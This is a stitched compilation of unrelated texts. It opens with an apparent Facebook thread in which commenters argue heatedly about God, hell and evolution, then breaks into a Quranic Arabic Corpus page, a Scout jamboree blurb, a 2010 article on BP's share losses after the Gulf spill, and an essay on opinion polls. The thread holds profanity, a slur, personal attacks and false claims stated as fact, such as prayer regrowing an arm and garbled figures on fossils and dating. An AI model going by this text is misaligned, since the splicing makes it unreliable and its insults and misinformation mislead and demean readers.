Donna : Dylan , you do an excellent job regergitating a whole bunch of other peoples theories ... i however have actually lived the truth that is found in the bible .. have witnessed the miracles and seen them in my own life ... when you have actually tested out all your head knowledge and have proven for yourself all the things that you have been taught then we can talk .. until then they remain just theory to you ... i do however encourage you to examine why you are so angry with the God that you are trying so hard to not believe in ... i believe in that you will find the answer ...
Christina ... I apologize for engaging in this lengthy debate on your wall .... forgive me if I have overstepped !!
4 hours ago
Cristina : I do n't mind debates but just be sure to remember that we are ALL entitled to our opinions and beliefs , no one can take that away from any of us .
For the record , I have not learned anything today .
I believe in God and nothing you or anyone else can say will ever change that .
I have seen countless videos on evolution over the years and they mean nothing to me , not even back in grade school .
BTW that was n't nice , were not idiots just because we do n't believe what you choose to believe .
4 hours ago
Rene :
You guys are funny , the short version is that God exists and so does evolution , everyone on earth came from one woman that lived in Africa 200,000 years ago , all other women 's children , and other humans died .
The Bible speaks to all ages , in our age Adam and Eve was Gods way to explain we are all family .
Dylan I encourage you to keep searching for the truth , but it wo n't be found in your head , even if all the logic was given to you , the truth is in your heart , if it 's not their , your not meant to find it , but God knows this , that some can't see , so he rewards the looking , I encourage you to learn to swim from the deep end
4 hours ago
Dom ( rational thiest ? ) :
I wonder if the God of Evolution is named ' Evolvus ' and if he he 's maybe kinda like a transformer ?
that 'd be pretty cool . ;)
4 hours ago
Dom ( rational thiest ? ) :
I was hoping to engage somewhere in here , but i wasnt sure if this had left the original premise of the wager and is now about something else , if it is , i can't really tell what it is .
I must be honest , i favor engagement with atheists or evolutionists over many christians , at least in these sorts of discussions , not that i'm referring to anyone in this thread , but i can sympathize with atheists on how purposefully ignorant many theists choose to be and remain .
there really is n't any short end to this discussion , I personally think differently regarding your island example Dylan , what originally inspired me to search after a higher power , God , or creator , author etc was looking at the grandeur of the sky and the stars and the diversity of life .
I think it would be incorrect to suggest there could only be one outcome to such a scenario .
Obviously the details leading to belief in a God are with or without exclusion .
4 hours ago
Cristina : Donna , you have not overstepped and there is no need to apologize :)
4 hours ago
Dom ( rational thiest ? ) :
I 'll also defend the character of the God of the scriptures , his examples through his prophets he has made clear that he esteems and values knowledge , wisdom and understanding as highly as life itself .
The reader is frequently reminded and encouraged by things like , ' my people perish by a lack of knowledge ' .
' seek and you will find , knock and it will be opened , ask and it will be given ' , in all your getting , get wisdom and so many more .
One of the main reasons i respect and admire the scriptures is there is a great portion of it that are compilations of writings from some exceptionally wise men of history , who 's valuable repose adjure the hearer to the best example of life at its fullest .
4 hours ago
Dom ( rational thiest ? ) : one of my fav's ,
Pro 25:2
It is the glory of God to hide things but the glory of kings to investigate them .
4 hours ago
Dom ( rational thiest ? ) : which , by the way Dylan , you could consider that a compliment :)
4 hours ago
Ellen : Disclaimer : This is not Ellen , but Ellen 's annoyed husband Gord .
Why am I annoyed ?
I have to spend the greater part of my evening reading all this and now I cant just walk away .
So I have to cultivate an answer that will take some time that I 'd rather spend doing something else .
Alright Dylan , sicnce you 're the smartest person in the room , maybe you should have known that a letter of that tone should have been sent to Cristina in a message form , cuz it was kinda preachy and personal .
This really wasnt the right venue .
1 : Pascals Wager .
You cant possibly take every single belief system into account and give it a valid vote when some have absolutely crazy claims .
Hindus believe that the world is suspended on the back of a giant elephant in space .
Honestly .
You cant give them a vote .
A Muslim once told me that it was " ... OK ... " that I have 2 girls and no boys .
Gee , thanks a lot .
My wife told him that it 's actually the man that determines the sex of the baby and he told us , " I have heard that there is an X and a Y , but I dont believe it " .
Some beliefs deserve a good look and some dont .
2 : Only morally good go to heaven ?
Thats to bad , because then we 'd all go to Hell .
There is not one morally good person except Jesus .
How do we even judge what is moral anyway without a standard ?
Man is at his core , evil .
Richard Carrier thinks that the only truely moral people are going to Heaven are the ones that search their whole life taking in any and all claims of truth , religion , testing each one for validity and are the only ones truely worthy of a place in heaven ?
What ???
Would n't you get to the end of the road sometime ?
It should n't take a whole lifetime .
" Ok , Hindu 's your turn ... you think the world is spinning on the back of a giant elephant , eh ?
Ok , next !!! "
3 : Caritable Acts .
You think you should just make the world a better place for being here , doing good , and hope to be remember fondly ?
Why ?
What difference would it make if I helped the old lady across the street or blew her brains out if there is no God and no punishment / reward , if we 're all just goo anyways ?
2 hours ago
dylan : Donna , do you know the difference between a theory and a hypothesis ?
" Just a theory " is the most ignorant thing anyone can say .
SCIENTIFIC theory can be backed up with EVIDENCE .
Give me evidence of god that is measurable and empirical , and I 'll believe in it .
Secondly , a lot of the things I 've said in this thread are my own ideas , not anyone else 's .
One of my favorite sayings is that " the act of innovation is forgetting where you plagiarized it "
Once something becomes so very understood , it can be explained without using the original text .
Cristina , by plugging your ears and shouting " na na na na not listening "
You have removed yourself from the debate .
If your god stood up to scrutiny you would n't have to do that .
Dominic , you 're the kind of theist I do n't mind debating , however , I see many errors in your thinking .
The beauty of nature is that it can be explained in mathematics and biology , you just need to read a little more .
You want to defend the " character of god of the scriptures ? "
okay : " The God of the Old Testament is arguably the most unpleasant character in all fiction : jealous and proud of it ; a petty , unjust , unforgiving control - freak ; a vindictive , bloodthirsty ethnic cleanser ; a misogynistic , homophobic , racist , infanticidal , genocidal , filicidal , pestilential , megalomaniacal , sadomasochistic , capriciously malevolent bully . ”
- Dawkins .
And do n't you dare say Jesus came to change all that , because it almost seems as though Jesus was anticipating 20th century biblical criticism when he authenticated these accounts .
The conclusion is simple .
If a person believes in Jesus Christ , he should be consistent and believe that the Old Testament and its accounts are correct .
Many want to accept Jesus , but also want to reject a large portion of the Old Testament .
This option is not available .
Either Jesus knew what he was talking about or he did not .
The evidence is clear that Jesus saw the Old Testament as being God 's Word ;
His attitude toward it was nothing less than total trust .
He confirmed many of the accounts in the Old Testament , such as the destruction of Sodom and the death of Lot 's wife ( Luke 17:29 , 32 ) , the murder of Abel by his brother Cain ( Luke 11:51 ) , the calling of Moses ( Mark 12:26 ) , the manna given in the wilderness ( John 6:31 - 51 ) , the judgment upon Tyre and Sidon ( Matthew 1 - 1:21 ) , and many others .
Soooo .
Your move .
2 hours ago ·
dylan :
Word of advice : my aunts were / are nuns and teach sunday school , my mom is Roman Catholic and a member of her choir at church and releases religious musical CDs , and I was raised catholic and rejected the god hypthosis around the age of 13 , and found out about the humanist movement about a decade ago .
I 've also read most of the bible .
2 hours ago ·
dylan : ironically , it was my quest to rekindle my relationship with god that lead me to disbelieve even stronger .
It was Christian texts which lead me to the path I 'm now on .
2 hours ago ·
Ellen : 4 : I actually believe that most people will end up going to Hell .
The bible says that narrow is the road that leads to life and few are them who find it .
Wide is the road that leads to destruction and many are those who travel it .
You have to " find " the narrow road .
You ever travel a highway , and see people driving a small road alongside the highway beside you ?
Thats like life .
Most people take the highway , but that leads to Hell , that little dirt road will take you to where you want to go .
3:Back to Charitable Acts .
What do you say about all those charitable acts you do ?
I 'll tell you .
He will count every little old lady you helped , every child you fed and time you said " aww " at the little sick animals , and every time you shook your fist at an oil company , and every time you cut your neighbors grass .
You know He calls that ?
Evil Deeds .
Why ?
Because those are the things we do that make us think we do n't need Him .
5:Conditioned Brains .
It sounds to me like your brain has been conditioned , it 's just that evolutionists got there first .
For as loud as you preach your beliefs at poor Cristina 's tiny wall post , you yourself have sat at the feet of those who claim to " know " and swallowed everything that they 've fed you .
Think Im wrong ?
I listened to your video .
And it 's all about stars and helium and measuring .
So what ?
" OhmyGOD !!!
We figured out that stars are made of Helium , there is no God ! ! ! "
6: Who is man that we think we are so smart that we can figure out everything about the human body , the planet around us , the galaxy around our planet , our universe ...
Your video says " we make calculations , and observations , and measurements ... " and so we know now that God is not real ?
Because we can measure light ?
Congratulations Humans !!!
Scientists are constantly changing their " theories " the earth is flat , wait a second , no , now its round .
The sun revolves around the earth , no wait , earth revolves around sun , sorry everyone !!!
2 hours ago
dylan :
The difference between science and religion is that science will adjust it 's views based on new evidence .
Religion forms it 's ideas and ignores any evidence against it .
Also Ellen , you are a disgusting , reprehensible excuse for a member of the human race .
To think for a moment that ANYONE deserves an eternity of suffering with no end for a list of small finite human crimes they commit on the short century that they happen to be here is the most insane unethical thing you could possibly say .
Let me give you an equivalent example .
Your son steals from the local grocer .
You lock him in your basement and feed him enough to survive , and whip him daily until you die for the one crime he commited .
Would you do that ?
Because that 's EXACTLY what your god does .
We are his children .
And for doing something wrong , like not believing in him , he locks us in his basement , and tortures and murders us in the most disgusting ways imaginable .
Secondly , you did n't watch the video .
You just looked at it , and said PSSH SCIENCE and turned your brain off .
By the way , you get to live TWICE AS LONG as your great great great grandparents .
TWICE AS LONG .
Thanks to science .
Nobody lived past 50 back then .
Fuck off .
2 hours ago ·
dylan :
And with that , I 'm completely done .
It 's people like that that will turn me off to a rational debate .
I 'll think twice before trying to talk about reality on facebook .
2 hours ago ·
Cristina : Dylan , I really am not happy about where this has gone .
Attacking people is not cool , debate all you want but do n't attack people :(
You seem very angry :(
2 hours ago
dylan :
She literally just said most of us deserve to have our flesh ripped off and burned for longer then our time here on earth .
That idea is abhorrent and disgusting .
2 hours ago ·
dylan : I 'm not commenting anymore - and if you knew me in person you would realize I 'm actually one of the most positive optimists on earth .
One of the only things that really get my goat though , is that people like her are allowed to lead nations .
2 hours ago ·
Ellen : 7 : There is no in - between human .
And the tooth you 're about to tell me about ?
The one they brought before congress to have the science books changed ?
Actually recently discovered to a pig .
8 : Miracles .
Ok Mr. Know - it - all , I can introduce you to a person who has personally seen a 1 armed man grow an arm in front of him .
Explain that .
I can then take you to a man that has personally walked on water .
Explain that .
( whiny voice ) - " But those are all OTHER people ... "
Ok , I 've personally seen a man be thrown backwards into the air , off his feet , while being prayed for by a preacher that did n't even touch him .
Hmm , seen the primordial soup lately ?
9 : You think you 're so intellectually superior to us cave people that believe in God ?
I have just spent an hour and a half crafting this response .
I DARE you to spend that much time reading this .......
http://books.google.ca/books?id=Wg66gWttf-cC&dq=case+for+creation+lee&printsec=frontcover&source=bn&hl=en&ei=oDUQTIC4LJ2QnwfhmIy9DQ&sa=X&oi=book_result&ct=result&resnum=6&ved=0CDQQ6AEwBQ#v=onepage&q&f=false
This is a book I 've read cover to cover , and if you can do that and still not believe in SOMETHING , I dont care , Aliens like Stephen Hawking , Then I dont know .
I guarantee that you 'll believe in something .
And look , I understand that it 's a real leap of faith to begin believing in something that you can " measure , calculate , see , taste , touch , " but you dont have to switch off your brain .
If God is real then there are real answers .
And no , you dont just have to sit down and shuddup and believe ' cause mamma told you to BOY !
There is plenty of room for someone like yourself with a strong muscle between his ears to fit into a relationship with a God thats real .
True , many people could n't answer tough questions in the past , but its not your daddy old time religiopn telling you that we dont ask questions like that around here , son .
If it 's real then theres an answer , and Im not afraid to tackle any question .
Im getting tired now .
If you wanna be a coward , then write a lengthy hate - filled response .
If YOU want to be honest , then read what I posted .
Lee Strobel was the science writer for the Chicago Tribune when his wife became a christian , so he set out on a course to disprove her beliefs and ended up becoming one of the best proponents of creationism .
There is no shame in changing your view , and if you need help on where to go next , I can , and am willing to help you , buddy .
2 hours ago
Cristina : and if you knew her or her husband you would know that they are some of the nicest people you could ever meet .
2 hours ago
Beau Banks
Wow i leave for work for a few hours and i see things have become interesting , and i also see the debate is done !
To bad i would of liked to way in .
2 hours ago
Dom ( rational thiest ? ) : nice one Dylan !
haahahah
the good thing about me , i'm seasoned enough that I dont need to react to such statements as i might have when i was younger .
i'd really like to have a further discussion perhaps elsewhere on what kinds of texts talked you out of your goal .
as for the old testament view , THANK YOU .
gosh , one of the most iritating things is when an atheist comprehends the bible better than christians .
i agree probably more than you even do on that topic . ;)
as for the ' negative ' characteristics , gotta love that anti-God evangelist .
its no secret , its not hidden and it certainly is n't untrue .
again , this may or may not be the appropriate environment to have such a discussion but it does me no harm .
These are valid concerns , extremely heavy weight and in my experience , some of the most difficult details to consider and that cause and hold people away from the faith .
How does one rationalize a god that orders the slaughter of women and children ?
how does one rationalize a god that orders their slaughter even after his great commandments of ' thou shall not kill ' ?
in that simple example not only can this god be considered a genocist , but also a hypocrite .
these are real questions , and for many hard questions , and rightly so .
how does one juggle those details ?
can God sin ?
excellent questions that deserve answers and make the difference of believing or not believing for many .
I 'll be totally transparent , some of those things I still have trouble with , not enough trouble to discard my faith , but enough to curiously dig and wade to find how it all works out .
Ultimately for me , my experience of his love outweighs what can be considered as negative qualities .
Its the quantity and quality of his love that forces me to believe that in those seldom cases it was as if there were no other way .
Obviously i'm not sharing that as a defense without drilling into the details , but moreso conversationally .
I 'm not afraid to ask those questions and even not know the answer .
as I said , the miracles and experiences i've had of his love enable me to trust through times when the details just do n't lineup or make sense .
So far , each time , it ends up making sense eventually , just a matter of my short sighted perspective needing some stretching .
2 hours ago
dylan : LOLOLOLOL LEE STROBEL ?!
SERIOUSLY ?
I 've read " The case for faith "
It 's TERRIBLE , and every single argument was a debunked rehash !
Aahhahhahaha .
The discovery institute is a freaking joke !
On top of that , I would take the time to read the book so I can debate you , but it would n't matter , because even though I would crush the arguments in the book , you would n't listen anyway !
Also , it 's been done !
It was made into a film , and it 's already been completely critically torn apart !
http://www.youtube.com/watch?v=fa-1Iyphqzc&feature=PlayList&p=DE495976F8D9C1E1&playnext_from=PL&index=0&playnext=1
<- starting there .
I 'm not gonna waste my time when it 's already been done .
To clarify : she outright rejected the very thing that is allowing her to comment , allows her children to know their grandparents , and allows her to watch television every night .
She rejected the thing that corrects her vision , heals her when she 's got an infection , and allows her children to be healthy and free of disease .
She rejects the thing that created paved roads , houses , air conditioning , her car , and the countless things she takes for granted every day .
I do n't believe aliens have ever visited earth , that 's crazy !
There 's no real evidence to support that !
Once there is , I might .
There is however STRONG evidence that life is ABUNDANT in the universe .
I 'm done .
2 hours ago ·
Ellen : Man , reading that back I made a lot of mistakes ( tired )
3 : should read " Charitable Acts "
3 : ...hope to be rememberED fondly ...
Back to Charitable Acts ... " what do you THINK GOD SAYS ...
You know WHAT He calls that ???
Evil Deeds .
7 :...recently discovered to BELONG to a pig .
... leap of faith believing in something you CANT measure ...
... Not your DADDY " S old time RELIGION ...
about an hour ago
Dom ( rational thiest ? ) : aww dylan , stepped outta bounds dude , its really not necessary to swear , especially on someone elses wall .
would you mind reposting ?
about an hour ago
dylan : Dom - you 're right .
Ignorance really pisses me off .
Wait wait wait wait ... one last thing :
7 : There is no in - between human .
And the tooth you 're about to tell me about ?
The one they brought before congress to have the science books changed ?
Actually recently discovered to a pig .
ARE YOU KIDDING ME ?
Yes , the ONE MISTAKEN ONE WAS FOUND TO BE A PIG .
TOO BAD THERE's OVER 30 OTHER FOSSILS THAT WERE NOT PIG BONES FROM THE SAME AREA .
Here 's your ancestors :
( A) Pan troglodytes , chimpanzee , modern
( B) Australopithecus africanus , STS 5 , 2.6 My
(C) Australopithecus africanus , STS 71 , 2.5 My
(D) Homo habilis , KNM -ER 1813 , 1.9 My
(E) Homo habilis , OH24 , 1.8 My
( F) Homo rudolfensis , KNM-ER 1470 , 1.8 My
( G) Homo erectus , Dmanisi cranium D2700 , 1.75 My
( H) Homo ergaster ( early H. erectus ) , KNM-ER 3733 , 1.75 My
( I) Homo heidelbergensis , " Rhodesia man , " 300,000 - 125,000 y
(J) Homo sapiens neanderthalensis , La Ferrassie 1 , 70,000 y
( K) Homo sapiens neanderthalensis , La Chappelle - aux - Saints , 60,000 y
(L) Homo sapiens neanderthalensis , Le Moustier , 45,000 y
( M) Homo sapiens sapiens , Cro-Magnon I , 30,000 y
(N) Homo sapiens sapiens , modern
about an hour ago ·
Cristina : Yikes , do we need to swear and attack each other ???
We do n't have to agree guys , it 's OK :)
I 'm feeling really bad :(
about an hour ago
Cristina :
Thanks guys :)
about an hour ago
dylan : http://www.talkorigins.org/
goodnight .
about an hour ago ·
dylan : A small thought before I go to bed :
I do see one thing that 's pervasive in some of your messages - you think that I'm " following the crowd " by being a secular humanist ...
You 're wrong .
MOST PEOPLE
Believe in a religion .
Most people believe in a personal god .
Most .
Most .
Most .
I 'm in a huge minority here .
Read about the dark ages , please .
It 's only since religion has loosened it 's grip on humanity that we have progressed .
about an hour ago ·
Beau Banks
Wow this is getting out of control , and clearly neither side is going to budge on their beliefs , and rightfully so because both side believe whole heartedly in what they are preaching , but also both sides have holes in their arguments !
Even in your video , which i greatly enjoyed , it says at the end scientists do n't have all the answers to how certain things are happening in the universe , and the Evolution has so many whole in it even scientists have a hard time believe in it .
but also ......
Yes there is no formula to prove God , and only some have claimed to have seen him or touch him .
Leaving the rest to have to use faith to believe , but i believe because i have seen miracles like the one Ellen spoke of with a man instantly regrowing his arm , and i believe if it came down to it and Christianity and Evolution were both banned with the penalty being death , you would see which side truly believes , there have already been millions upon millions of people who have given their live for something they can physically prove !
Do n't you think that counts for something ?
I no i have no hard proof and clearly Dylan you are beyond my IQ but i no what i have seen and believe .
No one has seen or documented a positive form of evolution , nor has anyone seen a planet suddenly spire with life , but i have seen men and women cured of cancer and tumours the size of baseballs over night with no explanation .
I 'm going to bed my body is at the moment sick , and im exhausted , but im gunna say one more thing .
What if your wrong ( sorry for being blunt ) what if there is a God and the bible is all truth .
There is a hell and a fallen angel ruling in hell .
What if when you die you are judged according the freewill you were given , and the choices you made .
What happens when the only way to heaven is through belief in Christ , and the alternative is hell .
Just stop do n't respond , and think about it .
Is eternity not worth mabey just trying to see if God is real .
Im not saying turn and repent that is dark age thinking , and if you look at the dark ages most ppl were n't able to read the bible themselves because well they could n't read , and were told what to believe , but we have a choice !
So is eternity mabey just worth seeing if Christ is real ...?
about an hour ago
dylan : Evolution has been physically proven .
Why do you keep calling it a Belief ?
It 's factual evidence backed up by more people , studies and fossils then you could possibly imagine .
There are no " holes " in evolution .
How many times do I have to say this .
You do n't BELIEVE in evolution .
You either understand it , or you do n't .
Do you BELIEVE in electricity ?
The ignorance of some people is literally keeping me up at night .
PLEASE PLEASE PLEASE Educate yourself before making claims .
And yes , we NOT SEEN A PLANET SUDDENLY SPIRE WITH LIFE ... not suddenly ...
BUT WE HAVE !
OVER 4.2 years of fossils and transitional species !
We have seen evolution in action !
EVERY SINGLE DAY !
Do you get the common cold ?
Do you know that the common cold EVOLVES so that your immune system has to fight it over and over and over again !?
The virus has existed for MILLIONS OF YEARS !
In THOUSANDS AND THOUSANDS OF SPECIES !
AND IT CHANGES .
CONSTANTLY .
I do n't care if you want to wear a blindfold , just please , please please Do n't spread LIES like " No one has seen or documented a positive form of evolution "
That 's an outright lie and intellectually dishonest .
And yes I am completely content never believing because the idea of eternity does not fit in with reality .
about an hour ago ·
dylan : PS : I 'm publishing this debate .
about an hour ago ·
Beau Banks lol the ability for the common cold to change is an adaptation , just like skin adapting to sunlight by changing color , and yes i word is as a belief because there are still holes in the theory
1 . How does evolution add information to a genome to create progressively more complicated organisms ?
2 . How is evolution able to bring about drastic changes so quickly ?
3 . How could the first living cell arise spontaneously to get evolution started ?
In all the years scientists have been trying to prove or recreate a positive mutation none have been successful , sure adaptations happen all the time , but animals that grow a third extremity or some other mutation often end up dead or die shortly after .
56 minutes ago
Beau Banks and as for educating myself , all I see in evolution is no progress and a bunch of dead fossilized bones most of which are found sometimes yards apart from each other and then pieced together to form something , and as for carbon dating , a lab was given a recently formed piece of rock from a volcano and the lab said it was millions of years old !
50 minutes ago
Steel : Evolution is a belief .
First off , to test or investigate , or to use any science at all , you first have to BELIEVE in the rational intelligibility of the universe .
Without this basic assumption or faith as some will say , all science is meaningless and useless .
Christians believe the universe is rationally intelligible because God designed it that way .
How do you account for the rational intelligibility of the universe ?
41 minutes ago
dylan : 1 : One of the main ways genetic information can increase over time in organisms ( over generations , not in a single individual ) , is via gene duplication and genome duplication .
Once genes are duplicated they have an independent history in terms of what mutations they will get , and via genetic drift or natural selection , they will over time diverge in function ( or one of the duplicates may loose its function and become what is known as a pseudogene ) .
mutations that produce a useful protein will add information .
Most mutations will be adverse , or at best neutral .
However , it only needs an occasional positive mutation to occur and natural selection will take over , to spread it through the population .
( pwned )
2 : Evolution never produces drastic changes spontaneously .
They can happen FASTER with large species deaths where only a small amount of them with a beneficial mutation survive .
Cheetahs for example , are a living example of this .
Let me give you a hypothetical one .
Lets say you have species XYZ living on a plane .
There 's MANY of them there and they are very diverse , and there are many little mutations ( like eyecolour and haircolour ! )
Now , lets say that the temperature of the plane lowers very fast because of a geological event like ... say , a volcano .
Most of them die because they can't handle the cold , but a select few , which are able to because they have a gene which makes their body temperature higher and makes them have more fat then other members of their species .
Now , ALL THOSE CREATURES survive , and the gene that makes the fat and body tempatures higher gets selected for , because the ones with the best version get mates and live longer to mate .
And there is a huge change over a short period of time .
Oh , and I 'm talking about polarbears .
( pwned )
3 : you 're talking about abiogenesis - and lucky for you , RNA has been sequenced in a lab , ALL BY ITSELF by letting it do it 's thing !
Also , we 've created LIFE OUT OF DNA MADE BY HUMANS .
Most amino acids , often called " the building blocks of life " , can form via natural chemical reactions unrelated to life , as demonstrated in the Miller–Urey experiment and similar experiments , which involved simulating the conditions of the early Earth , in a scientific laboratory .
In all living things , these amino acids are organized into proteins , and the construction of these proteins is mediated by nucleic acids .
Which of these organic molecules first arose and how they formed the first life is the focus of abiogenesis .
This video explains it .
http://www.youtube.com/watch?v=U6QYDdgP9eg
Sorry , science wins .
God=
Not necessary .
Have a good one .
37 minutes ago ·
Cristina : Dylan , your being nasty again .
" Sorry , science wins .
God=
Not necessary .
Have a good one . "
God might not be necessary to you but He is to many of us other people who share this world with you .
I think it 's cool that you know so much and that your so passionate about evolution but you have to realize that we are just as passionate about our God .
I just find that you are trying so hard to prove to us that God does n't exist , why ???
Are n't we allowed to believe what we choose just like you choose to believe in evolution ??
21 minutes ago
dylan :
Did you even read what I wrote ?
14 minutes ago ·
dylan : Again with the " Believe " I do n't " Believe " in evolution !
I 've weighed the evidence , and realized , it 's factual .
I do n't BELIEVE in it at all .
It 's as real as gravity !
* headdesk *
Do you BELIEVE that o2 lets you breathe ?
You 're perfectly allowed to believe in yaweh , but it 's terrib anti-science anti-REALITY thinking like what ellen and Beau are spouting that is COMPLETELY AND UTTERLY dangerous .
12 minutes ago ·
Cristina : yes I did , what are you referring to ??
10 minutes ago
dylan : Obviously you read it , but you did n't understand a word .
I just CLEARLY answered , much of it in my own words , every single question your friend asked .
Kindly , even though I could be doing other things .
God is not necessary for LIFE to happen , is what I was saying .
Please do n't take it personally .
Cristina :
Here 's the problem Dylan , I did understand what you said , you just do n't want to hear anything that does n't align with your facts .
I 'm not trying to be difficult , I just do n't have faith in all these facts you talk about .
Why are there more and more scientists that are turning creationists ???
Surely their not stupid uneducated people who are being mislead , something did not add up and made them question the theory evolution .
Look I do not know a quarter of what you know on evolution and I cannot debate with you on the facts , all I can say is that I 'm happy with my beliefs and if your happy with all your facts , then we 're good , right ??
You always seemed very cool and I think I 'm a pretty easy going fun loving person , we 're good people who are not out to hurt anyone , is n't that enough ??
We think differently but that 's OK :)
7 minutes ago
dylan : 3 : Ellen ( or husband , I do n;t know anymore )
So if you found definitive proof that there 's no god , you 'd shoot old ladies ?
because to you , there 's no consequence ?
The consequence is the destruction of societies .
The destruction of altruism and that has a negative impact on the whole .
Do you think that people would not attack you for hurting someone without any reason ?
We invented hell as an additional means to scare people into being good , but it was only necessary in a time without police and jails and guns .
If god is the ultimate judge , why do we throw people in prison to prevent them from doing it again ?
In your worldview , god will punish hum , but everyone he kills will go to heaven ...
YAAAAAAAAAAY !!?!?!?!
Your argument is retarded .
4 minutes ago ·
dylan : " Why are there more and more scientists that are turning creationists ? ? ? "
Can you please show me evidence of this ?
Like ... a published paper ?
Because the facts are that 99.9 % of all scientists reject creationism outright :
You 're pulling that quote from the air .
Back it up .
Welcome to the Quranic Arabic Corpus , an annotated linguistic resource which shows the Arabic grammar , syntax and morphology for each word in the Holy Quran .
The corpus provides three levels of analysis : morphological annotation , a syntactic treebank and a semantic ontology .
The Quran is a significant religious text written in Quranic Arabic , and is followed by believers of the Islamic faith .
The Quran contains 6,236 numbered verses ( ayāt ) and is divided into 114 chapters .
An example verse from the Quran :
( 21:30 ) Have those who disbelieved not considered that the heavens and the earth were a joined entity , and We separated them and made from water every living thing ?
Then will they not believe ?
Version 0.4 Released - new and updated linguistic features in this version of the corpus
Word by Word Quran - maps out the syntax of the entire Quran , with analysis and translation
Quranic Grammar - traditional Arabic grammar ( إعراب ) illustrated using dependency graphs
How you can get involved
This project contributes to the research of the Quran by applying natural language computing technology to analyze the Arabic text of each verse .
The word by word grammar is very accurate , but ensuring complete accuracy is not possible without your help .
If you come across a word and you feel that a better analysis could be provided , you can suggest a correction online by clicking on an Arabic word .
World map of users of the Quranic Arabic Corpus , provided by Google Analytics .
Countries with the highest number of users are shaded in darker green .
The map above shows worldwide interest in the Quranic Arabic Corpus .
Every day , the website is used by over 2,500 people from 165 different countries .
Help us review the information on this website so that together we can build the most accurate linguistic resource for Quranic Arabic .
The Quranic Arabic Dependency Treebank ( QADT )
The Quranic treebank is an effort to map out the entire grammar of the Quran by linking Arabic words through dependencies .
The linguistic structure of verses is represented using mathematical graph theory .
The annotated corpus provides a novel visualization of Quranic syntax using dependency graphs .
The Ontology of Quranic Concepts
The Quranic Ontology uses knowledge representation to define the key concepts in the Quran , and shows the relationships between these concepts using predicate logic .
Named entities in verses , such as the names of historic people and places mentioned in the Quran , are linked to concepts in the ontology .
See Also
Nothing is impossible for the prepared young person — no future is out of reach for a group of committed people who care .
It ’s important to signal that the limits people perceive are self - imposed , and that with an embrace and application of the 12 points of the Scout Law and three points of the Scout Oath , there is a bright and positive future .
Participants in the 2021 National Jamboree will learn that character is created when you achieve more than you thought possible .
BP's $ 70 billion whipping
Since April 20 when the Gulf oil spill began , BP shares have tumbled about 40 % .
NEW YORK ( CNNMoney.com ) --
Despite the sharp fall in BP 's share price following the company 's inability to cap a leaking well in the Gulf of Mexico , most analysts say the selloff is overdone .
BP shares sank nearly 15 % Tuesday after the company 's latest attempt to seal the leaking Gulf oil well failed over the weekend .
The selloff accelerated just before the closing bell , when U.S. Attorney General Eric Holder announced a criminal probe into the spill .
Since the accident happened April 20 , which resulted in 11 deaths and an oil leak of up to 19,000 barrels per day , BP shares have fallen nearly 40 % , wiping out nearly $ 70 billion in shareholder value .
Before the accident the company had a market capitalization of nearly $ 183 billion .
Now it 's just below $ 115 billion .
Investors are concerned the clean up costs , lawsuits , and added restrictions from the spill , the worst in U.S. history , will sap BP 's earnings potential .
Plus , like most big oil projects , BP is self - insured for the operation , so all of the costs of the cleanup and damages will fall on its shoulders .
No one knows how much the spill will eventually cost BP .
Estimates have ranged from $ 3 billion to $ 25 billion - many fall somewhere in the middle .
As of Tuesday BP said it has spent just shy of $ 1 billion on the accident .
But whatever the price tag , it will likely be paid out over a period of years .
For a company that made nearly $ 17 billion in profit last year and is expected to top $ 20 billion this year , most analysts say the stock hit is unjustified .
" They 've got a balance sheet you could slap $ 20 billion of debt on and not miss a beat , " said Mark Gilman , an oil and gas analyst with the Benchmark Co. , a boutique broker - dealer .
" We think the financial hit has been excessive . "
Indeed , so do the majority of analysts .
In England , where BP ( BP ) is based , 38 analysts have a buy rating on the stock and eight have it as a hold .
Only three recommend selling it , said Douglas Youngson , an oil analyst at Arbuthnot Securities , a London - based investment bank .
Beyond the clean up costs and lawsuits , there 's also possible damage to BP 's reputation .
This is , after all , the company that branded itself an environmentally friendly oil firm , buying wind farms and solar arrays and adopting the slogan " Beyond Petroleum . "
Will there there be a major public backlash ?
" Here in America we tend to have pretty short memories , " said Ken Carol , an oil analyst at Johnson Rice & Co . " There was a big boycott after the Exxon Valdez , and they seem to be doing just fine now . "
Carrol also did n't think the spill would impact too heavily on BP 's relationship with other oil companies .
Because of the high up front costs to develop an oil field , many partners are often required on a project .
In this case , BP had partnered with Anadarko ( APC , Fortune 500 ) and the Japanese firm Matsui .
Many subcontractors are also brought in to work on an oil well .
The primary subcontracts in this case were Halliburton ( HAL , Fortune 500 ) and Transocean ( RIG ) .
Might it be harder for BP to find partners in the wake of this disaster ?
" BP has been a good partner before , " said Carrol .
" I do n't think people will turn their backs on them . "
Carrol said the selloff in BP 's share price was likely overdone , but said he did n't expect it to get any better until BP can fix the problem .
As long as the well is leaking , the costs are adding up , he said .
Dissenting opinion
When BP will fix the problem is anyone 's guess .
The company is trying to put a new dome over the leak this week , but with several previous attempts to cap the well failing , that procedure looks like a long shot .
The company is saying it may not be able to stop the leak until August , when a relief well being drilled into the failed well 's base is completed .
" That 's two months of horrible images and horrific headlines , " said Youngson , the analyst at Arbuthnot Securities .
Youngson is one of the few analysts that are recommending people sell BP 's stock .
He thinks that in addition to the massive cleanup and liability cots , BP will face serious regulatory pressure going forward .
That may mean a loss of leases in the Gulf of Mexico , and a loss of confidence from their peers .
" Anything BP does in the future will be under the microscope , and that will drive costs higher , " he said .
Youngson also brought up another possibility that most other analysts have not openly talked about to date :
That BP stock could get so cheap it might be the subject of a takeover .
He thinks if the stock falls much below $ 30 a share , BP will become a target .
Shares traded around $ 38 Tuesday afternoon .
' If the share price continues to fall , " he said , " other companies may see this for the bargain it will be . "
No attempt to examine the knowledge base of the respondent is made .
No exploration of the framework for an opinion is established .
No determination of the source of the information upon which an opinion is based is explored .
It is enough to just have an opinion .
CNN will collect them .
MSNBC will discuss them .
FOX News will banner them .
And , all of these random opinions will form the basis of the news cycle , as if they mattered .
Imagine a society conducted around the random thoughts of your average 14 year old !
After this mass of noise is gathered into a neat little bundle called , " Public Opinion " it quickly takes on a life of its own .
Anyone who , heretofore , had not given the issue any real thought is suddenly presented with an answer to the question , " What do you think ? "
The are confronted with an overwhelming social tendency to agree with their peers .
To conform to the weight of opinion that seems at the very least , to have been offered by those who have thought of the issue more than they .
Here are two examples .
Note , passion , cries of justice , issues with your Mother , and infrequent headaches , do not provide a logical defense .
What do you think of the I/P issues ?
( Confession .
I never read those diaries because I can't get through the spittle and angst to any real understanding of WHY such violent opinions are held . )
Defend your position and tell me why you hold that view .
